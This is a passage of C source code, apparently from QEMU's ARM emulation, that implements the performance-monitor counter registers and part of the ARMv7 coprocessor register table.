< hpmn || counter == 31)) { e = env->cp15.c9_pmcr & PMCRE; } else { e = env->cp15.mdcr_el2 & MDCR_HPME; } enabled = e && (env->cp15.c9_pmcnten & (1ULL << counter)); if (!secure) { if (el == 2 && (counter < (hpmn & 0x7) || counter == 31)) { prohibited = env->cp15.mdcr_el2 & MDCR_HPMD; } else { prohibited = false; } } else { prohibited = arm_feature(env, ARM_FEATURE_EL3) && (env->cp15.mdcr_el3 & MDCR_SPME); } if (prohibited && counter == 31) { prohibited = env->cp15.c9_pmcr & PMCRDP; } if (counter == 31) { filter = env->cp15.pmccfiltr_el0; } else { filter = env->cp15.c14_pmevtyper[counter]; } p = filter & PMXEVTYPER_P; u = filter & PMXEVTYPER_U; nsk = arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_NSK); nsu = arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_NSU); nsh = arm_feature(env, ARM_FEATURE_EL2) && (filter & PMXEVTYPER_NSH); m = arm_el_is_aa64(env, 1) && arm_feature(env, ARM_FEATURE_EL3) && (filter & PMXEVTYPER_M); if (el == 0) { filtered = secure ? u : u != nsu; } else if (el == 1) { filtered = secure ? p : p != nsk; } else if (el == 2) { filtered = !nsh; } else { /* EL3 */ filtered = m != p; } if (counter != 31) { /* * If not checking PMCCNTR, ensure the counter is setup to an event we * support */ uint16_t event = filter & PMXEVTYPER_EVTCOUNT; if (!event_supported(event)) { return false; } } return enabled && !prohibited && !filtered; } /* * Ensure c15_ccnt is the guest-visible count so that operations such as * enabling/disabling the counter or filtering, modifying the count itself, * etc. can be done logically. This is essentially a no-op if the counter is * not enabled at the time of the call. */ static void pmccntr_op_start(CPUARMState *env) { uint64_t cycles = cycles_get_count(env); if (pmu_counter_enabled(env, 31)) { uint64_t eff_cycles = cycles; if (env->cp15.c9_pmcr & PMCRD) { /* Increment once every 64 processor clock cycles */ eff_cycles /= 64; } uint64_t new_pmccntr = eff_cycles - env->cp15.c15_ccnt_delta; uint64_t overflow_mask = env->cp15.c9_pmcr & PMCRLC ? \ 1ull << 63 : 1ull << 31; if (env->cp15.c15_ccnt & ~new_pmccntr & overflow_mask) { env->cp15.c9_pmovsr |= (1 << 31); } env->cp15.c15_ccnt = new_pmccntr; } env->cp15.c15_ccnt_delta = cycles; } /* * If PMCCNTR is enabled, recalculate the delta between the clock and the * guest-visible count. A call to pmccntr_op_finish should follow every call to * pmccntr_op_start. */ static void pmccntr_op_finish(CPUARMState *env) { #if 0 if (pmu_counter_enabled(env, 31)) { /* Calculate when the counter will next overflow */ uint64_t remaining_cycles = -env->cp15.c15_ccnt; if (!(env->cp15.c9_pmcr & PMCRLC)) { remaining_cycles = (uint32_t)remaining_cycles; } int64_t overflow_in = cycles_ns_per(remaining_cycles); if (overflow_in > 0) { int64_t overflow_at = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + overflow_in; ARMCPU *cpu = env_archcpu(env); timer_mod_anticipate_ns(cpu->pmu_timer, overflow_at); } uint64_t prev_cycles = env->cp15.c15_ccnt_delta; if (env->cp15.c9_pmcr & PMCRD) { /* Increment once every 64 processor clock cycles */ prev_cycles /= 64; } env->cp15.c15_ccnt_delta = prev_cycles - env->cp15.c15_ccnt; } #endif } static void pmevcntr_op_start(CPUARMState *env, uint8_t counter) { uint16_t event = env->cp15.c14_pmevtyper[counter] & PMXEVTYPER_EVTCOUNT; uint64_t count = 0; if (event_supported(event)) { uint16_t event_idx = supported_event_map[event]; count = pm_events[event_idx].get_count(env); } if (pmu_counter_enabled(env, counter)) { uint32_t new_pmevcntr = count - env->cp15.c14_pmevcntr_delta[counter]; if (env->cp15.c14_pmevcntr[counter] & ~new_pmevcntr & INT32_MIN) { env->cp15.c9_pmovsr |= (1ULL << counter); } env->cp15.c14_pmevcntr[counter] = new_pmevcntr; } env->cp15.c14_pmevcntr_delta[counter] = count; } static void pmevcntr_op_finish(CPUARMState *env, uint8_t counter) { #if 0 if (pmu_counter_enabled(env, counter)) { uint16_t event = env->cp15.c14_pmevtyper[counter] & PMXEVTYPER_EVTCOUNT; uint16_t event_idx = supported_event_map[event]; uint64_t delta = UINT32_MAX - (uint32_t)env->cp15.c14_pmevcntr[counter] + 1; int64_t overflow_in = pm_events[event_idx].ns_per_count(delta); if (overflow_in > 0) { int64_t overflow_at = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + overflow_in; ARMCPU *cpu = env_archcpu(env); timer_mod_anticipate_ns(cpu->pmu_timer, overflow_at); } env->cp15.c14_pmevcntr_delta[counter] -= env->cp15.c14_pmevcntr[counter]; } #endif } void pmu_op_start(CPUARMState *env) { unsigned int i; pmccntr_op_start(env); for (i = 0; i < pmu_num_counters(env); i++) { pmevcntr_op_start(env, i); } } void pmu_op_finish(CPUARMState *env) { unsigned int i; pmccntr_op_finish(env); for (i = 0; i < pmu_num_counters(env); i++) { pmevcntr_op_finish(env, i); } } void pmu_pre_el_change(ARMCPU *cpu, void *ignored) { pmu_op_start(&cpu->env); } void pmu_post_el_change(ARMCPU *cpu, void *ignored) { pmu_op_finish(&cpu->env); } void arm_pmu_timer_cb(void *opaque) { ARMCPU *cpu = opaque; /* * Update all the counter values based on the current underlying counts, * triggering interrupts to be raised, if necessary. pmu_op_finish() also * has the effect of setting the cpu->pmu_timer to the next earliest time a * counter may expire. */ pmu_op_start(&cpu->env); pmu_op_finish(&cpu->env); } static void pmcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmu_op_start(env); if (value & PMCRC) { /* The counter has been reset */ env->cp15.c15_ccnt = 0; } if (value & PMCRP) { unsigned int i; for (i = 0; i < pmu_num_counters(env); i++) { env->cp15.c14_pmevcntr[i] = 0; } } env->cp15.c9_pmcr &= ~PMCR_WRITEABLE_MASK; env->cp15.c9_pmcr |= (value & PMCR_WRITEABLE_MASK); pmu_op_finish(env); } static void pmswinc_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { unsigned int i; for (i = 0; i < pmu_num_counters(env); i++) { /* Increment a counter's count iff: */ if ((value & (1ULL << i)) && /* counter's bit is set */ /* counter is enabled and not filtered */ pmu_counter_enabled(env, i) && /* counter is SW_INCR */ (env->cp15.c14_pmevtyper[i] & PMXEVTYPER_EVTCOUNT) == 0x0) { pmevcntr_op_start(env, i); /* * Detect if this write causes an overflow since we can't predict * PMSWINC overflows like we can for other events */ uint32_t new_pmswinc = env->cp15.c14_pmevcntr[i] + 1; if (env->cp15.c14_pmevcntr[i] & ~new_pmswinc & INT32_MIN) { env->cp15.c9_pmovsr |= (1ULL << i); } env->cp15.c14_pmevcntr[i] = new_pmswinc; pmevcntr_op_finish(env, i); } } } static uint64_t pmccntr_read(CPUARMState *env, const ARMCPRegInfo *ri) { uint64_t ret; pmccntr_op_start(env); ret = env->cp15.c15_ccnt; pmccntr_op_finish(env); return ret; } static void pmselr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* The value of PMSELR.SEL affects the behavior of PMXEVTYPER and * PMXEVCNTR. We allow [0..31] to be written to PMSELR here; in the * meanwhile, we check PMSELR.SEL when PMXEVTYPER and PMXEVCNTR are * accessed. */ env->cp15.c9_pmselr = value & 0x1f; } static void pmccntr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); env->cp15.c15_ccnt = value; pmccntr_op_finish(env); } static void pmccntr_write32(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint64_t cur_val = pmccntr_read(env, NULL); pmccntr_write(env, ri, deposit64(cur_val, 0, 32, value)); } static void pmccfiltr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); env->cp15.pmccfiltr_el0 = value & PMCCFILTR_EL0; pmccntr_op_finish(env); } static void pmccfiltr_write_a32(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmccntr_op_start(env); /* M is not accessible from AArch32 */ env->cp15.pmccfiltr_el0 = (env->cp15.pmccfiltr_el0 & PMCCFILTR_M) | (value & PMCCFILTR); pmccntr_op_finish(env); } static uint64_t pmccfiltr_read_a32(CPUARMState *env, const ARMCPRegInfo *ri) { /* M is not visible in AArch32 */ return env->cp15.pmccfiltr_el0 & PMCCFILTR; } static void pmcntenset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmcnten |= value; } static void pmcntenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmcnten &= ~value; } static void pmovsr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmovsr &= ~value; } static void pmovsset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pmovsr |= value; } static void pmevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value, const uint8_t counter) { if (counter == 31) { pmccfiltr_write(env, ri, value); } else if (counter < pmu_num_counters(env)) { pmevcntr_op_start(env, counter); /* * If this counter's event type is changing, store the current * underlying count for the new type in c14_pmevcntr_delta[counter] so * pmevcntr_op_finish has the correct baseline when it converts back to * a delta. */ uint16_t old_event = env->cp15.c14_pmevtyper[counter] & PMXEVTYPER_EVTCOUNT; uint16_t new_event = value & PMXEVTYPER_EVTCOUNT; if (old_event != new_event) { uint64_t count = 0; if (event_supported(new_event)) { uint16_t event_idx = supported_event_map[new_event]; count = pm_events[event_idx].get_count(env); } env->cp15.c14_pmevcntr_delta[counter] = count; } env->cp15.c14_pmevtyper[counter] = value & PMXEVTYPER_MASK; pmevcntr_op_finish(env, counter); } /* Attempts to access PMXEVTYPER are CONSTRAINED UNPREDICTABLE when * PMSELR value is equal to or greater than the number of implemented * counters, but not equal to 0x1f. We opt to behave as a RAZ/WI. */ } static uint64_t pmevtyper_read(CPUARMState *env, const ARMCPRegInfo *ri, const uint8_t counter) { if (counter == 31) { return env->cp15.pmccfiltr_el0; } else if (counter < pmu_num_counters(env)) { return env->cp15.c14_pmevtyper[counter]; } else { /* * We opt to behave as a RAZ/WI when attempts to access PMXEVTYPER * are CONSTRAINED UNPREDICTABLE. See comments in pmevtyper_write(). */ return 0; } } static void pmevtyper_writefn(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); pmevtyper_write(env, ri, value, counter); } static void pmevtyper_rawwrite(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); env->cp15.c14_pmevtyper[counter] = value; /* * pmevtyper_rawwrite is called between a pair of pmu_op_start and * pmu_op_finish calls when loading saved state for a migration. Because * we're potentially updating the type of event here, the value written to * c14_pmevcntr_delta by the preceeding pmu_op_start call may be for a * different counter type. Therefore, we need to set this value to the * current count for the counter type we're writing so that pmu_op_finish * has the correct count for its calculation. */ uint16_t event = value & PMXEVTYPER_EVTCOUNT; if (event_supported(event)) { uint16_t event_idx = supported_event_map[event]; env->cp15.c14_pmevcntr_delta[counter] = pm_events[event_idx].get_count(env); } } static uint64_t pmevtyper_readfn(CPUARMState *env, const ARMCPRegInfo *ri) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); return pmevtyper_read(env, ri, counter); } static void pmxevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmevtyper_write(env, ri, value, env->cp15.c9_pmselr & 31); } static uint64_t pmxevtyper_read(CPUARMState *env, const ARMCPRegInfo *ri) { return pmevtyper_read(env, ri, env->cp15.c9_pmselr & 31); } static void pmevcntr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value, uint8_t counter) { if (counter < pmu_num_counters(env)) { pmevcntr_op_start(env, counter); env->cp15.c14_pmevcntr[counter] = value; pmevcntr_op_finish(env, counter); } /* * We opt to behave as a RAZ/WI when attempts to access PM[X]EVCNTR * are CONSTRAINED UNPREDICTABLE. */ } static uint64_t pmevcntr_read(CPUARMState *env, const ARMCPRegInfo *ri, uint8_t counter) { if (counter < pmu_num_counters(env)) { uint64_t ret; pmevcntr_op_start(env, counter); ret = env->cp15.c14_pmevcntr[counter]; pmevcntr_op_finish(env, counter); return ret; } else { /* We opt to behave as a RAZ/WI when attempts to access PM[X]EVCNTR * are CONSTRAINED UNPREDICTABLE. */ return 0; } } static void pmevcntr_writefn(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); pmevcntr_write(env, ri, value, counter); } static uint64_t pmevcntr_readfn(CPUARMState *env, const ARMCPRegInfo *ri) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); return pmevcntr_read(env, ri, counter); } static void pmevcntr_rawwrite(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); assert(counter < pmu_num_counters(env)); env->cp15.c14_pmevcntr[counter] = value; pmevcntr_write(env, ri, value, counter); } static uint64_t pmevcntr_rawread(CPUARMState *env, const ARMCPRegInfo *ri) { uint8_t counter = ((ri->crm & 3) << 3) | (ri->opc2 & 7); assert(counter < pmu_num_counters(env)); return env->cp15.c14_pmevcntr[counter]; } static void pmxevcntr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { pmevcntr_write(env, ri, value, env->cp15.c9_pmselr & 31); } static uint64_t pmxevcntr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return pmevcntr_read(env, ri, env->cp15.c9_pmselr & 31); } static void pmuserenr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { if (arm_feature(env, ARM_FEATURE_V8)) { env->cp15.c9_pmuserenr = value & 0xf; } else { env->cp15.c9_pmuserenr = value & 1; } } static void pmintenset_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* We have no event counters so only the C bit can be changed */ value &= pmu_counter_mask(env); env->cp15.c9_pminten |= value; } static void pmintenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= pmu_counter_mask(env); env->cp15.c9_pminten &= ~value; } static void vbar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Note that even though the AArch64 view of this register has bits * [10:0] all RES0 we can only mask the bottom 5, to comply with the * architectural requirements for bits which are RES0 only in some * contexts. (ARMv8 would permit us to do no masking at all, but ARMv7 * requires the bottom five bits to be RAZ/WI because they're UNK/SBZP.) */ raw_write(env, ri, value & ~0x1FULL); } static void scr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Begin with base v8.0 state. */ uint32_t valid_mask = 0x3fff; ARMCPU *cpu = env_archcpu(env); if (arm_el_is_aa64(env, 3)) { value |= SCR_FW | SCR_AW; /* these two bits are RES1. */ valid_mask &= ~SCR_NET; } else { valid_mask &= ~(SCR_RW | SCR_ST); } if (!arm_feature(env, ARM_FEATURE_EL2)) { valid_mask &= ~SCR_HCE; /* On ARMv7, SMD (or SCD as it is called in v7) is only * supported if EL2 exists. The bit is UNK/SBZP when * EL2 is unavailable. In QEMU ARMv7, we force it to always zero * when EL2 is unavailable. * On ARMv8, this bit is always available. */ if (arm_feature(env, ARM_FEATURE_V7) && !arm_feature(env, ARM_FEATURE_V8)) { valid_mask &= ~SCR_SMD; } } if (cpu_isar_feature(aa64_lor, cpu)) { valid_mask |= SCR_TLOR; } if (cpu_isar_feature(aa64_pauth, cpu)) { valid_mask |= SCR_API | SCR_APK; } /* Clear all-context RES0 bits. */ value &= valid_mask; raw_write(env, ri, value); } static CPAccessResult access_aa64_tid2(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID2)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static uint64_t ccsidr_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); /* Acquire the CSSELR index from the bank corresponding to the CCSIDR * bank */ uint32_t index = A32_BANKED_REG_GET(env, csselr, ri->secure & ARM_CP_SECSTATE_S); return cpu->ccsidr[index]; } static void csselr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { raw_write(env, ri, value & 0xf); } static uint64_t isr_read(CPUARMState *env, const ARMCPRegInfo *ri) { CPUState *cs = env_cpu(env); uint64_t hcr_el2 = arm_hcr_el2_eff(env); uint64_t ret = 0; bool allow_virt = (arm_current_el(env) == 1 && (!arm_is_secure_below_el3(env) || (env->cp15.scr_el3 & SCR_EEL2))); if (allow_virt && (hcr_el2 & HCR_IMO)) { if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { ret |= CPSR_I; } } else { if (cs->interrupt_request & CPU_INTERRUPT_HARD) { ret |= CPSR_I; } } if (allow_virt && (hcr_el2 & HCR_FMO)) { if (cs->interrupt_request & CPU_INTERRUPT_VFIQ) { ret |= CPSR_F; } } else { if (cs->interrupt_request & CPU_INTERRUPT_FIQ) { ret |= CPSR_F; } } /* External aborts are not possible in QEMU so A bit is always clear */ return ret; } static CPAccessResult access_aa64_tid1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID1)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static CPAccessResult access_aa32_tid1(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { return access_aa64_tid1(env, ri, isread); } return CP_ACCESS_OK; } static const ARMCPRegInfo v7_cp_reginfo[] = { /* the old v6 WFI, UNPREDICTABLE in v7 but we choose to NOP */ { .name = "NOP", .cp = 15, .crn = 7, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_NOP }, /* Performance monitors are implementation defined in v7, * but with an ARM recommended set of registers, which we * follow. * * Performance registers fall into three categories: * (a) always UNDEF in PL0, RW in PL1 (PMINTENSET, PMINTENCLR) * (b) RO in PL0 (ie UNDEF on write), RW in PL1 (PMUSERENR) * (c) UNDEF in PL0 if PMUSERENR.EN==0, otherwise accessible (all others) * For the cases controlled by PMUSERENR we must set .access to PL0_RW * or PL0_RO as appropriate and then check PMUSERENR in the helper fn. */ { .name = "PMCNTENSET", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcnten), .writefn = pmcntenset_write, .accessfn = pmreg_access, .raw_writefn = raw_write }, { .name = "PMCNTENSET_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 1, .access = PL0_RW, .accessfn = pmreg_access, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcnten), .resetvalue = 0, .writefn = pmcntenset_write, .raw_writefn = raw_write }, { .name = "PMCNTENCLR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcnten), .accessfn = pmreg_access, .writefn = pmcntenclr_write, .type = ARM_CP_ALIAS }, { .name = "PMCNTENCLR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 2, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcnten), .writefn = pmcntenclr_write }, { .name = "PMOVSR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 3, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmovsr), .accessfn = pmreg_access, .writefn = pmovsr_write, .raw_writefn = raw_write }, { .name = "PMOVSCLR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsr_write, .raw_writefn = raw_write }, { .name = "PMSWINC", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 4, .access = PL0_W, .accessfn = pmreg_access_swinc, .type = ARM_CP_NO_RAW | ARM_CP_IO, .writefn = pmswinc_write }, { .name = "PMSWINC_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 4, .access = PL0_W, .accessfn = pmreg_access_swinc, .type = ARM_CP_NO_RAW | ARM_CP_IO, .writefn = pmswinc_write }, { .name = "PMSELR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 5, .access = PL0_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmselr), .accessfn = pmreg_access_selr, .writefn = pmselr_write, .raw_writefn = raw_write}, { .name = "PMSELR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 5, .access = PL0_RW, .accessfn = pmreg_access_selr, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmselr), .writefn = pmselr_write, .raw_writefn = raw_write, }, { .name = "PMCCNTR", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 0, .access = PL0_RW, .resetvalue = 0, .type = ARM_CP_ALIAS | ARM_CP_IO, .readfn = pmccntr_read, .writefn = pmccntr_write32, .accessfn = pmreg_access_ccntr }, { .name = "PMCCNTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 0, .access = PL0_RW, .accessfn = pmreg_access_ccntr, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c15_ccnt), .readfn = pmccntr_read, .writefn = pmccntr_write, .raw_readfn = raw_read, .raw_writefn = raw_write, }, { .name = "PMCCFILTR", .cp = 15, .opc1 = 0, .crn = 14, .crm = 15, .opc2 = 7, .writefn = pmccfiltr_write_a32, .readfn = pmccfiltr_read_a32, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .resetvalue = 0, }, { .name = "PMCCFILTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 15, .opc2 = 7, .writefn = pmccfiltr_write, .raw_writefn = raw_write, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.pmccfiltr_el0), .resetvalue = 0, }, { .name = "PMXEVTYPER", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access, .writefn = pmxevtyper_write, .readfn = pmxevtyper_read }, { .name = "PMXEVTYPER_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 1, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access, .writefn = pmxevtyper_write, .readfn = pmxevtyper_read }, { .name = "PMXEVCNTR", .cp = 15, .crn = 9, .crm = 13, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access_xevcntr, .writefn = pmxevcntr_write, .readfn = pmxevcntr_read }, { .name = "PMXEVCNTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 13, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = pmreg_access_xevcntr, .writefn = pmxevcntr_write, .readfn = pmxevcntr_read }, { .name = "PMUSERENR", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 0, .access = PL0_R | PL1_RW, .accessfn = access_tpm, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmuserenr), .resetvalue = 0, .writefn = pmuserenr_write, .raw_writefn = raw_write }, { .name = "PMUSERENR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 14, .opc2 = 0, .access = PL0_R | PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmuserenr), .resetvalue = 0, .writefn = pmuserenr_write, .raw_writefn = raw_write }, { .name = "PMINTENSET", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pminten), .resetvalue = 0, .writefn = pmintenset_write, .raw_writefn = raw_write }, { .name = "PMINTENSET_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 1, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenset_write, .raw_writefn = raw_write, .resetvalue = 0x0 }, { .name = "PMINTENCLR", .cp = 15, .crn = 9, .crm = 14, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenclr_write, }, { .name = "PMINTENCLR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 2, .access = PL1_RW, .accessfn = access_tpm, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pminten), .writefn = pmintenclr_write }, { .name = "CCSIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = 0, .access = PL1_R, .accessfn = access_aa64_tid2, .readfn = ccsidr_read, .type = ARM_CP_NO_RAW }, { .name = "CSSELR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_aa64_tid2, .writefn = csselr_write, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.csselr_s), offsetof(CPUARMState, cp15.csselr_ns) } }, /* Auxiliary ID register: this actually has an IMPDEF value but for now * just RAZ for all cores: */ { .name = "AIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 1, .crn = 0, .crm = 0, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid1, .resetvalue = 0 }, /* Auxiliary fault status registers: these also are IMPDEF, and we * choose to RAZ/WI for all cores. */ { .name = "AFSR0_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 5, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 5, .crm = 1, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, /* MAIR can just read-as-written because we don't implement caches * and so don't need to care about memory attributes. */ { .name = "MAIR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[1]), .resetvalue = 0 }, { .name = "MAIR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 10, .crm = 2, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[3]), .resetvalue = 0 }, /* For non-long-descriptor page tables these are PRRR and NMRR; * regardless they still act as reads-as-written for QEMU. */ /* MAIR0/1 are defined separately from their 64-bit counterpart which * allows them to assign the correct fieldoffset based on the endianness * handled in the field definitions. */ { .name = "MAIR0", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.mair0_s), offsetof(CPUARMState, cp15.mair0_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "MAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.mair1_s), offsetof(CPUARMState, cp15.mair1_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "ISR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 12, .crm = 1, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_R, .readfn = isr_read }, /* 32 bit ITLB invalidates */ { .name = "ITLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "ITLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "ITLBIASID", .cp = 